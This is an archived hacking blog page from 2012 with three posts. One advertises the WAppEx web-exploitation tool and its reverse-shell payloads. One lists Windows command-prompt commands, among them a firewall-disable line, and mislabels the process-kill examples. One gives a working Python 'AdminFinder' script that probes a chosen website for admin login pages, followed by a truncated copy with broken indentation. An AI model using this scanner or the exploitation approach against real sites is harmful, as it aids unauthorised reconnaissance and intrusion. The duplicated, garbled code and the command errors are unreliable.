Root-Exploit: สิงหาคม 2012

วันอาทิตย์ที่ 19 สิงหาคม พ.ศ. 2555

WAppEx : Web Application Exploiter

WAppEx is an integrated platform for performing penetration testing and exploiting of web applications on Windows or Linux. It can automatically check for all type of security vulnerabilities in the given target and then let you to run various payloads to exploit and take advantages of the vulnerability.
WAppEx is a multi platform application and it is executable in Linux and Windows.

WAppEx's database which includes hundreds of exploits provides an automated, comprehensive and reliable exploit for penetration testers and security professionals worldwide.
Regular database update is available. Top priorities are high-risk and zero-day vulnerabilities.

Payloads for using in exploits are reliable payloads which contains connect-back, listener shell, arbitrary code execution, arbitrary file upload,...

WAppEx's script based engin let experienced users write their own scripts and payloads to test and exploit any vulnerability in web applications.

Software and vulnerability updates are available at any time and a daily support is available via phone or email.

WAppEx can exploit the following web application vulnerabilities:

SQL Injection:
The most dangerous vulnerability in web applications. WAppEx uses Havij - Advanced SQL Injection Tool engine to find and exploit this vulnerability.

Remote File Inclusion:
It allows an attacker to include a remote file. WAppEx can check for this vulnerability and run various payloads to execute commands on web server.

Local File Inclusion:
It allows an attacker to include a local file. Just like RFI WAppEx tests and exploits this vulnerability.

OS Commanding:
It let the attacker to execute OS commands on server. WAppEx tests and exploits this vulnerability to execute custom commands to get a reverse shell.

Script injection:
It can be used by an attacker to introduce (or "inject") script into a web application. WAppEx automatically tests and exploit this vulnerability to escalate access to web server and get a reverse shell.

Local File Disclosure:
as the name says it disclosure content of local files on the web server. WAppEx can exploit this vulnerability to read sensitive files on the server.

WAppEx contains the following tools to help you in penetration testing and exploiting web apps.

Online Hash Cracker: A tool for cracking hashes using the reverse lookup in online sites.
Encoder/Decoder: An encoder/decoder with a complete encryption algorithms.
Find Login Page: It looks for login pages on a target.
Browser: A small browser you can use to view source code and HTTP headers.

WAppEx is so easy to use and also so flexible. It doesn't matter you're a beginner or a professional, using WAppEx makes your works easier, faster and more effective.

Top 10 Important command prompt's commands

In this tutorial i will guide you to top 10 important and famous command prompt commands with their usage.

1. ipconfig :
This is the top most command for seeing the ip address,subnet mask and default gateway also includes display and flush DNS cache, re-register the system name in DNS.. This will most useful tool for viewing and troubleshooting TCP/IP problem.

To view ip ,subnet mask address : ipconfig
To view all TCP/IP information, use: ipconfig /all
To view the local DNS cache, use: ipconfig /displaydns
To delete the contents in the local DNS cache, use: ipconfig /flushdns

2.systeminfo

Have a need to display operating system configuration information for a local or remote machine, including service pack levels? Then systeminfo is the tool to use. When I need to connect to a system that I am not familiar with, this is the first tool I run. The output of this command gives me all the info I need including: host name, OS type, version, product ID, install date, boot time and hardware info (processor and memory). Also knowing what hot fixes are installed can be a big help when troubleshooting problems. This tool can be used to connect to a machine remotely using the following syntax: SYSTEMINFO /S system /U user

3. tasklist and taskkill

If you work with Task Manager (ctrl+alt+del) ,you can easily understand this. Task list is list of task which are running on windows currently. If you open any application,it will be added to task.

To List the Tasks type in cmd as :

tasklist

This will show the list of task which are running as shown in the picture

To stop the Process or task ,there is two methods :
Using Image Name:
We can kill the task using its Image Name as follows:

tasklist /im notepad.exe

Using Process Id:
we can stop the process using its process id as follows :

tasklist /pid 1852

4. type
type is used to read the text document in command prompt . You can read multiple text in continuously

type filename.txt

5.netstat
Need to know who (or what) is making a connection to your computer? Then netstat is the tool you want to run. The output provides valuable information of all connections and listening ports, including the executable used in the connections. In additon to the above info, you can view Ethernet statistics, and resolve connecting host IP Addresses to a fully qualified domain name. I usually run the netstat command using the -a (displays all connection info), -n (sorts in numerical form) and -b (displays executable name) switches.

6.net command
Although this tool is more known as a command, the net command is really like a power drill with different bits and is used to update, fix, or view the network or network settings.
It is mostly used for viewing (only services that are started), stopping and starting services:

net stop server
net start server
net start (display running services)

and for connecting (mapping) and disconnecting with shared network drives:

net use m: \\myserver\sharename
net use m: \\myserver\sharename /delete

Other commands used with net command are, accounts (manage user accounts), net print (manage print jobs), and net share (manage shares).
Below are all the options that can be used with the net command.

[ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |HELPMSG | LOCALGROUP | PAUSE | PRINT | SESSION | SHARE | START |STATISTICS | STOP | TIME | USE | USER | VIEW ]

7 - nslookup - With the Internet, DNS (Domain Name Service) is the key for allowing us to use friendly names when surfing the web instead of needing to remember IP Addresses. But when there are problems, nslookup can be a valuable tool for testing and troubleshooting DNS servers.
Nslookup can be run in two modes: interactive and noninteractive. Noninteractive mode is useful when only a single piece of data needs to be returned. For example, to resolve google.com:

To use the interactive mode, just type nslookup at the prompt. To see all available options, type help while in interactive mode.

Don't let the help results intimidate you. Nslookup is easy to use. Some of the options I use when troubleshooting are:
set ds (displays detailed debugging information of behind the scenes communication when resolving an host or IP Address).
set domain (sets the default domain to use when resolving, so you don't need to type the fully qualified name each time).
set type (sets the query record type that will be returned, such as A, MX, NS)
server NAME (allows you to point nslookup to use other DNS servers than what is configured on your computer)
To exit out of interactive mode, type exit .

8 - ping and tracert - These tools can be helpful with connectivity to other systems. Ping will test whether a particular host is reachable across an IP network, while tracert (traceroute) is used to determine the route taken by packets across an IP network.
To ping a system just type at the prompt: ping www.google.com. By default, ping will send three ICMP request to the host and listen for ICMP “echo response” replies. Ping also includes switches to control the number of echo requests to send (-n ), and to resolve IP addresses to hostname (-a ).
To use tracert, type at the prompt: tracert www.google.com. You can force tracert to not resolve address to hostnames by using the -d switch, or set the desired timeout (milliseconds) for each reply using -w switch.
9 - gpresult - Used mostly in environments that implement group poicies, gpresults (Group Policy Results) verifies all policy settings in effect for a specific user or computer. The command is simple to use, just enter gpresults at the prompt. It can also be used to connect to computers remotely using the /S and /U switches.
10 - netsh - Without a doubt the most powerful command line tool available in Windows. Netsh is like the swiss army knife for configuring and monitoring Windows computers from the command prompt. It capabilities include:

Configure interfaces
Configure routing protocols
Configure filters
Configure routes
Configure remote access behavior for Windows-based remote access routers that are running the Routing and Remote Access Server (RRAS) Service
Display the configuration of a currently running router on any computer

Some examples of what you can do with netsh:

Enable or disable Windows firewall:

netsh firewall set opmode disable
netsh firewall set opmode disable

Enable or disable ICMP Echo Request (for pinging) in Windows firewall:

netsh firewall set icmpsetting 8 enable
netsh firewall set icmpsetting 8 disable

Configure your NIC to automatically obtain an IP address from a DHCP server:

netsh interface ip set address "Local Area Connection" dhcp

(For the above command, if your NIC is named something else, use netsh interface ip show config and replace the name at Local Area Connection).
As you can see netsh can do alot. Instead of re-inventing the wheel, check out the following Microsoft article for more info on netsh.

วันศุกร์ที่ 17 สิงหาคม พ.ศ. 2555

ค้นหา Admin Login

Admin Page Scripts(1)

#Created for coded32 and his teamopenfire Eliminated Some bugs from my last code shared here as Guest.
#Greets To T.O.F and Indishell
#Thanks friends for find bugs and give suggetions

#cd direcory/to/code
#direcory/to/code>python code.py

#improved Error Handling
#Find out usefull stuffs from www.teamopenfire.com
#"wE aRe gREat inDIans"

import httplib
import socket
import sys


try:
    print "\t################################################################"
    print "\t#                                        www.teamopenfire.com  #"
    print "\t#       ###############      ########       ############       #"
    print "\t#       #             #     ##      ##      #          #       #"
    print "\t#       ######   ######     ##      ##      #   ########       #"
    print "\t#            #   #          ##      ##      #   #              #"
    print "\t#            #   #          ##      ##      #   #####          #"
    print "\t#            #   #          ##      ##      #   #####          #"
    print "\t#            #   #          ##      ##      #   #              #"
    print "\t#            #   #          ##      ##      #   #              #"
    print "\t#            #####    [#]    ########   [#] #####  AdminFinder #"
    print "\t#                                                              #"
    print "\t#                                            coded by Ajith KP #"
    print "\t#                          Greets to Coded32 and T.O.F members #"
    print "\t################################################################"
    var1=0
    var2=0

    php = ['admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
'memberadmin/','administratorlogin/','adm/','admin/account.php','admin/index.php','admin/login.php','admin/admin.php','admin/account.php',
'admin_area/admin.php','admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
'admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html',
'admin/controlpanel.php','admin.php','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',
'admin/cp.php','cp.php','administrator/index.php','administrator/login.php','nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php',
'administrator/account.php','administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php',
'bb-admin/index.html','bb-admin/login.html','acceso.php','bb-admin/admin.html','admin/home.html','login.php','modelsearch/login.php','moderator.php','moderator/login.php',
'moderator/admin.php','account.php','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php',
'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php','adminarea/index.html','adminarea/admin.html',
'webadmin.php','webadmin/index.php','webadmin/admin.php','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.html',
'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',
'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',
'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpanel.html','admincontrol.html',
'panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','admin.php','adminarea/index.php',
'adminarea/admin.php','adminarea/login.php','panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php',
'modelsearch/admin.php','admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login.php','admin2/index.php','usuarios/login.php',
'adm/index.php','adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php']

    asp = ['admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
'memberadmin/','administratorlogin/','adm/','account.asp','admin/account.asp','admin/index.asp','admin/login.asp','admin/admin.asp',
'admin_area/admin.asp','admin_area/login.asp','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
'admin_area/admin.html','admin_area/login.html','admin_area/index.html','admin_area/index.asp','bb-admin/index.asp','bb-admin/login.asp','bb-admin/admin.asp',
'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','admin/controlpanel.html','admin.html','admin/cp.html','cp.html',
'administrator/index.html','administrator/login.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator.html',
'moderator/login.html','moderator/admin.html','account.html','controlpanel.html','admincontrol.html','admin_login.html','panel-administracion/login.html',
'admin/home.asp','admin/controlpanel.asp','admin.asp','pages/admin/admin-login.asp','admin/admin-login.asp','admin-login.asp','admin/cp.asp','cp.asp',
'administrator/account.asp','administrator.asp','acceso.asp','login.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','administrator/login.asp',
'moderator/admin.asp','controlpanel.asp','admin/account.html','adminpanel.html','webadmin.html','pages/admin/admin-login.html','admin/admin-login.html',
'webadmin/index.html','webadmin/admin.html','webadmin/login.html','user.asp','user.html','admincp/index.asp','admincp/login.asp','admincp/index.html',
'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','adminarea/index.html','adminarea/admin.html','adminarea/login.html',
'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admin/admin_login.html',
'admincontrol/login.html','adm/index.html','adm.html','admincontrol.asp','admin/account.asp','adminpanel.asp','webadmin.asp','webadmin/index.asp',
'webadmin/admin.asp','webadmin/login.asp','admin/admin_login.asp','admin_login.asp','panel-administracion/login.asp','adminLogin.asp',
'admin/adminLogin.asp','home.asp','admin.asp','adminarea/index.asp','adminarea/admin.asp','adminarea/login.asp','admin-login.html',
'panel-administracion/index.asp','panel-administracion/admin.asp','modelsearch/index.asp','modelsearch/admin.asp','administrator/index.asp',
'admincontrol/login.asp','adm/admloginuser.asp','admloginuser.asp','admin2.asp','admin2/login.asp','admin2/index.asp','adm/index.asp',
'adm.asp','affiliate.asp','adm_auth.asp','memberadmin.asp','administratorlogin.asp','siteadmin/login.asp','siteadmin/index.asp','siteadmin/login.html']

    cfm = ['admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
'memberadmin/','administratorlogin/','adm/','admin/account.cfm','admin/index.cfm','admin/login.cfm','admin/admin.cfm','admin/account.cfm',
'admin_area/admin.cfm','admin_area/login.cfm','siteadmin/login.cfm','siteadmin/index.cfm','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
'admin_area/index.cfm','bb-admin/index.cfm','bb-admin/login.cfm','bb-admin/admin.cfm','admin/home.cfm','admin_area/login.html','admin_area/index.html',
'admin/controlpanel.cfm','admin.cfm','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',
'admin/cp.cfm','cp.cfm','administrator/index.cfm','administrator/login.cfm','nsw/admin/login.cfm','webadmin/login.cfm','admin/admin_login.cfm','admin_login.cfm',
'administrator/account.cfm','administrator.cfm','admin_area/admin.html','pages/admin/admin-login.cfm','admin/admin-login.cfm','admin-login.cfm',
'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.cfm','modelsearch/login.cfm','moderator.cfm','moderator/login.cfm',
'moderator/admin.cfm','account.cfm','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.cfm','admincontrol.cfm',
'admin/adminLogin.html','acceso.cfm','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.cfm','adminarea/index.html','adminarea/admin.html',
'webadmin.cfm','webadmin/index.cfm','webadmin/admin.cfm','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.cfm','moderator.html',
'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',
'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',
'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.cfm','account.html','controlpanel.html','admincontrol.html',
'panel-administracion/login.cfm','wp-login.cfm','adminLogin.cfm','admin/adminLogin.cfm','home.cfm','admin.cfm','adminarea/index.cfm',
'adminarea/admin.cfm','adminarea/login.cfm','panel-administracion/index.cfm','panel-administracion/admin.cfm','modelsearch/index.cfm',
'modelsearch/admin.cfm','admincontrol/login.cfm','adm/admloginuser.cfm','admloginuser.cfm','admin2.cfm','admin2/login.cfm','admin2/index.cfm','usuarios/login.cfm',
'adm/index.cfm','adm.cfm','affiliate.cfm','adm_auth.cfm','memberadmin.cfm','administratorlogin.cfm']

    js = ['admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
'memberadmin/','administratorlogin/','adm/','admin/account.js','admin/index.js','admin/login.js','admin/admin.js','admin/account.js',
'admin_area/admin.js','admin_area/login.js','siteadmin/login.js','siteadmin/index.js','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
'admin_area/index.js','bb-admin/index.js','bb-admin/login.js','bb-admin/admin.js','admin/home.js','admin_area/login.html','admin_area/index.html',
'admin/controlpanel.js','admin.js','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',
'admin/cp.js','cp.js','administrator/index.js','administrator/login.js','nsw/admin/login.js','webadmin/login.js','admin/admin_login.js','admin_login.js',
'administrator/account.js','administrator.js','admin_area/admin.html','pages/admin/admin-login.js','admin/admin-login.js','admin-login.js',
'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.js','modelsearch/login.js','moderator.js','moderator/login.js',
'moderator/admin.js','account.js','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.js','admincontrol.js',
'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.js','adminarea/index.html','adminarea/admin.html',
'webadmin.js','webadmin/index.js','acceso.js','webadmin/admin.js','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.js','moderator.html',
'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',
'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',
'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.js','account.html','controlpanel.html','admincontrol.html',
'panel-administracion/login.js','wp-login.js','adminLogin.js','admin/adminLogin.js','home.js','admin.js','adminarea/index.js',
'adminarea/admin.js','adminarea/login.js','panel-administracion/index.js','panel-administracion/admin.js','modelsearch/index.js',
'modelsearch/admin.js','admincontrol/login.js','adm/admloginuser.js','admloginuser.js','admin2.js','admin2/login.js','admin2/index.js','usuarios/login.js',
'adm/index.js','adm.js','affiliate.js','adm_auth.js','memberadmin.js','administratorlogin.js']

    cgi = ['admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
'memberadmin/','administratorlogin/','adm/','admin/account.cgi','admin/index.cgi','admin/login.cgi','admin/admin.cgi','admin/account.cgi',
'admin_area/admin.cgi','admin_area/login.cgi','siteadmin/login.cgi','siteadmin/index.cgi','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
'admin_area/index.cgi','bb-admin/index.cgi','bb-admin/login.cgi','bb-admin/admin.cgi','admin/home.cgi','admin_area/login.html','admin_area/index.html',
'admin/controlpanel.cgi','admin.cgi','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',
'admin/cp.cgi','cp.cgi','administrator/index.cgi','administrator/login.cgi','nsw/admin/login.cgi','webadmin/login.cgi','admin/admin_login.cgi','admin_login.cgi',
'administrator/account.cgi','administrator.cgi','admin_area/admin.html','pages/admin/admin-login.cgi','admin/admin-login.cgi','admin-login.cgi',
'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.cgi','modelsearch/login.cgi','moderator.cgi','moderator/login.cgi',
'moderator/admin.cgi','account.cgi','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.cgi','admincontrol.cgi',
'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.cgi','adminarea/index.html','adminarea/admin.html',
'webadmin.cgi','webadmin/index.cgi','acceso.cgi','webadmin/admin.cgi','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.cgi','moderator.html',
'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',
'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',
'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.cgi','account.html','controlpanel.html','admincontrol.html',
'panel-administracion/login.cgi','wp-login.cgi','adminLogin.cgi','admin/adminLogin.cgi','home.cgi','admin.cgi','adminarea/index.cgi',
'adminarea/admin.cgi','adminarea/login.cgi','panel-administracion/index.cgi','panel-administracion/admin.cgi','modelsearch/index.cgi',
'modelsearch/admin.cgi','admincontrol/login.cgi','adm/admloginuser.cgi','admloginuser.cgi','admin2.cgi','admin2/login.cgi','admin2/index.cgi','usuarios/login.cgi',
'adm/index.cgi','adm.cgi','affiliate.cgi','adm_auth.cgi','memberadmin.cgi','administratorlogin.cgi']

    brf = ['admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
'memberadmin/','administratorlogin/','adm/','admin/account.brf','admin/index.brf','admin/login.brf','admin/admin.brf','admin/account.brf',
'admin_area/admin.brf','admin_area/login.brf','siteadmin/login.brf','siteadmin/index.brf','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
'admin_area/index.brf','bb-admin/index.brf','bb-admin/login.brf','bb-admin/admin.brf','admin/home.brf','admin_area/login.html','admin_area/index.html',
'admin/controlpanel.brf','admin.brf','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',
'admin/cp.brf','cp.brf','administrator/index.brf','administrator/login.brf','nsw/admin/login.brf','webadmin/login.brfbrf','admin/admin_login.brf','admin_login.brf',
'administrator/account.brf','administrator.brf','acceso.brf','admin_area/admin.html','pages/admin/admin-login.brf','admin/admin-login.brf','admin-login.brf',
'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.brf','modelsearch/login.brf','moderator.brf','moderator/login.brf',
'moderator/admin.brf','account.brf','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.brf','admincontrol.brf',
'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.brf','adminarea/index.html','adminarea/admin.html',
'webadmin.brf','webadmin/index.brf','webadmin/admin.brf','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.brf','moderator.html',
'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',
'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',
'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.brf','account.html','controlpanel.html','admincontrol.html',
'panel-administracion/login.brf','wp-login.brf','adminLogin.brf','admin/adminLogin.brf','home.brf','admin.brf','adminarea/index.brf',
'adminarea/admin.brf','adminarea/login.brf','panel-administracion/index.brf','panel-administracion/admin.brf','modelsearch/index.brf',
'modelsearch/admin.brf','admincontrol/login.brf','adm/admloginuser.brf','admloginuser.brf','admin2.brf','admin2/login.brf','admin2/index.brf','usuarios/login.brf',
'adm/index.brf','adm.brf','affiliate.brf','adm_auth.brf','memberadmin.brf','administratorlogin.brf']
    
    try:
        site = raw_input("Web Site for Scan?: ")
        site = site.replace("http://","")
        print ("\tChecking website " + site + "...")
        conn = httplib.HTTPConnection(site)
        conn.connect()
        print "\t[$] Yes... Server is Online."
    except (httplib.HTTPResponse, socket.error) as Exit:
        raw_input("\t [!] Oops Error occured, Server offline or invalid URL")
        exit()
    print "Enter site source code:"
    print "1 PHP"
    print "2 ASP"
    print "3 CFM"
    print "4 JS"
    print "5 CGI"
    print "6 BRF"
    print "\nPress 1 and 'Enter key' for Select PHP\n"
    code=input("> ")
        
    if code==1:
        print("\t [+] Scanning " + site + "...\n\n")
        for admin in php:
            admin = admin.replace("\n","")
            admin = "/" + admin
            host = site + admin
            print ("\t [#] Checking " + host + "...")
            connection = httplib.HTTPConnection(site)
            connection.request("GET",admin)
            response = connection.getresponse()
            var2 = var2 + 1
            if response.status == 200:
                var1 = var1 + 1
                print "%s %s" % ( "\n\n>>>" + host, "Admin page found!")
                raw_input("Press enter to continue scanning.\n")
            elif response.status == 404:
                var2 = var2
            elif response.status == 302:
                print "%s %s" % ("\n>>>" + host, "Possible admin page (302 - Redirect)")
            else:
                print "%s %s %s" % (host, " Interesting response:", response.status)
            connection.close()
        print("\n\nCompleted \n")
        print var1, " Admin pages found"
        print var2, " total pages scanned"
        raw_input("[/] The Game Over; Press Enter to Exit")


    if code==2:
        print("\t [+] Scanning " + site + "...\n\n")
        for admin in asp:
            admin = admin.replace("\n","")
            admin = "/" + admin
            host = site + admin
            print ("\t [#] Checking " + host + "...")
            connection = httplib.HTTPConnection(site)
            connection.request("GET",admin)
            response = connection.getresponse()
            var2 = var2 + 1
            if response.status == 200:
                var1 = var1 + 1
                print "%s %s" % ( "\n\n>>>" + host, "Admin page found!")
                raw_input("Press enter to continue scanning.\n")
            elif response.status == 404:
                var2 = var2
            elif response.status == 302:
                print "%s %s" % ("\n>>>" + host, "Possible admin page (302 - Redirect)")
            else:
                print "%s %s %s" % (host, " Interesting response:", response.status)
            connection.close()
        print("\n\nCompleted \n")
        print var1, " Admin pages found"
        print var2, " total pages scanned"
        raw_input("The Game Over; Press Enter to Exit")

    if code==3:
        print("\t [+] Scanning " + site + "...\n\n")
        for admin in cfm:
            admin = admin.replace("\n","")
            admin = "/" + admin
            host = site + admin
            print ("\t [#] Checking " + host + "...")
            connection = httplib.HTTPConnection(site)
            connection.request("GET",admin)
            response = connection.getresponse()
            var2 = var2 + 1
            if response.status == 200:
                var1 = var1 + 1
                print "%s %s" % ( "\n\n>>>" + host, "Admin page found!")
                raw_input("Press enter to continue scanning.\n")
            elif response.status == 404:
                var2 = var2
            elif response.status == 302:
                print "%s %s" % ("\n>>>" + host, "Possible admin page (302 - Redirect)")
            else:
                print "%s %s %s" % (host, " Interesting response:", response.status)
            connection.close()
        print("\n\nCompleted \n")
        print var1, " Admin pages found"
        print var2, " total pages scanned"
        raw_input("The Game Over; Press Enter to Exit")

    if code==4:
        print("\t [+] Scanning " + site + "...\n\n")
        for admin in js:
            admin = admin.replace("\n","")
            admin = "/" + admin
            host = site + admin
            print ("\t [#] Checking " + host + "...")
            connection = httplib.HTTPConnection(site)
            connection.request("GET",admin)
            response = connection.getresponse()
            var2 = var2 + 1
            if response.status == 200:
                var1 = var1 + 1
                print "%s %s" % ( "\n\n>>>" + host, "Admin page found!")
                raw_input("Press enter to continue scanning.\n")
            elif response.status == 404:
                var2 = var2
            elif response.status == 302:
                print "%s %s" % ("\n>>>" + host, "Possible admin page (302 - Redirect)")
            else:
                print "%s %s %s" % (host, " Interesting response:", response.status)
            connection.close()
        print("\n\nCompleted \n")
        print var1, " Admin pages found"
        print var2, " total pages scanned"
        raw_input("The Game Over; Press Enter to Exit")

    if code==5:
        print("\t [+] Scanning " + site + "...\n\n")
        for admin in cgi:
            admin = admin.replace("\n","")
            admin = "/" + admin
            host = site + admin
            print ("\t [#] Checking " + host + "...")
            connection = httplib.HTTPConnection(site)
            connection.request("GET",admin)
            response = connection.getresponse()
            var2 = var2 + 1
            if response.status == 200:
                var1 = var1 + 1
                print "%s %s" % ( "\n\n>>>" + host, "Admin page found!")
                raw_input("Press enter to continue scanning.\n")
            elif response.status == 404:
                var2 = var2
            elif response.status == 302:
                print "%s %s" % ("\n>>>" + host, "Possible admin page (302 - Redirect)")
            else:
                print "%s %s %s" % (host, " Interesting response:", response.status)
            connection.close()
        print("\n\nCompleted \n")
        print var1, " Admin pages found"
        print var2, " total pages scanned"
        raw_input("The Game Over; Press Enter to Exit")

    if code==6:
        print("\t [+] Scanning " + site + "...\n\n")
        for admin in brf:
            admin = admin.replace("\n","")
            admin = "/" + admin
            host = site + admin
            print ("\t [#] Checking " + host + "...")
            connection = httplib.HTTPConnection(site)
            connection.request("GET",admin)
            response = connection.getresponse()
            var2 = var2 + 1
            if response.status == 200:
                var1 = var1 + 1
                print "%s %s" % ( "\n\n>>>" + host, "Admin page found!")
                raw_input("Press enter to continue scanning.\n")
            elif response.status == 404:
                var2 = var2
            elif response.status == 302:
                print "%s %s" % ("\n>>>" + host, "Possible admin page (302 - Redirect)")
            else:
                print "%s %s %s" % (host, " Interesting response:", response.status)
            connection.close()
        print("\n\nCompleted \n")
        print var1, " Admin pages found"
        print var2, " total pages scanned"
        raw_input("The Game Over; Press Enter to Exit")
except (httplib.HTTPResponse, socket.error):
    print "\n\t[!] Session Cancelled; Error occured. Check internet settings"
except (KeyboardInterrupt, SystemExit):
    print "\n\t[!] Session cancelled"

Admin Page Scripts(2)

#Created for coded32 and his teamopenfire Eliminated Some bugs from my last code shared here as Guest.

#Greets To T.O.F and Indishell

#Thanks friends for find bugs and give suggetions

#cd direcory/to/code

#direcory/to/code>python code.py

#improved Error Handling

#Find out usefull stuffs from www.teamopenfire.com

#"wE aRe gREat inDIans"

import httplib

import socket

import sys

try:

print "\t################################################################"

print "\t# www.teamopenfire.com #"

print "\t# ############### ######## ############ #"

print "\t# # # ## ## # # #"

print "\t# ###### ###### ## ## # ######## #"

print "\t# # # ## ## # # #"

print "\t# # # ## ## # ##### #"

print "\t# # # ## ## # # #"

print "\t# ##### [#] ######## [#] ##### AdminFinder #"

print "\t# #"

print "\t# coded by Ajith KP #"

print "\t# Greets to Coded32 and T.O.F members #"

print "\t################################################################"

var1=0

var2=0

php = ['admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',

'memberadmin/','administratorlogin/','adm/','admin/account.php','admin/index.php','admin/login.php','admin/admin.php','admin/account.php',

'admin_area/admin.php','admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',

